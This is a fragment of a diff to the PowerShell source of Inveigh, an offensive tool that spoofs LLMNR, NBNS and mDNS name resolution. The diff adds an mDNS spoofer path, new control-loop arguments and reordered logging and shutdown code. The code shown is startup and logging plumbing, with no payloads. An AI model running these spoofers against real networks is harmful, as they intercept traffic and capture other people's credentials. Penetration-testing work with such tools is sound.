$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($NBNS_response_message).AddArgument( - $SpooferIP).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( - $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( - $NBNSTTL) > $null + $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore).AddArgument($NBNSTTL) > $null $NBNS_spoofer_powershell.BeginInvoke() > $null } -# Spoofer Startup function +# NBNS Brute Force Spoofer Startup Function function NBNSBruteForceSpoofer() { $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() @@ -3206,7 +3973,7 @@ function NBNSBruteForceSpoofer() $NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null } -# Control Startup Function +# Control Loop Startup Function function ControlLoop() { $control_runspace = [RunspaceFactory]::CreateRunspace() @@ -3215,8 +3982,8 @@ function ControlLoop() $control_powershell = [PowerShell]::Create() $control_powershell.Runspace = $control_runspace $control_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $control_powershell.AddScript($control_scriptblock).AddArgument($NBNSBruteForcePause).AddArgument( - $RunCount).AddArgument($RunTime) > $null + $control_powershell.AddScript($control_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument( + $NBNSBruteForcePause).AddArgument($RunCount).AddArgument($RunTime) > $null $control_powershell.BeginInvoke() > $null } @@ -3243,11 +4010,11 @@ if($Proxy -eq 'Y') } # Sniffer/Spoofer Start -if(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege) +if(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege) { SnifferSpoofer } -elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege) +elseif(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege) { if($LLMNR -eq 'Y') @@ -3255,6 +4022,11 @@ elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privi LLMNRSpoofer } + if($mDNS -eq 'Y') + { + mDNSSpoofer + } + if($NBNS -eq 'Y') { NBNSSpoofer @@ -3274,11 +4046,12 @@ if($NBNSBruteForce -eq 'Y') } # Control Loop Start -if($RunCount -or $RunTime -or $inveigh.file_output -or $NBNSBruteForcePause) +if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -or $RunCount -or $RunTime) { ControlLoop } +# Console Output Loop if($inveigh.console_output) { @@ -3500,44 +4273,57 @@ if($inveigh) catch { Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null + } + } } if($inveigh.relay_running) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + } + + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.relay_running = $false + } if($inveigh.running) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + } + + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.running = $false + } - $inveigh.HTTP = $false $inveigh.HTTPS = $false Start-Sleep -S 5 } |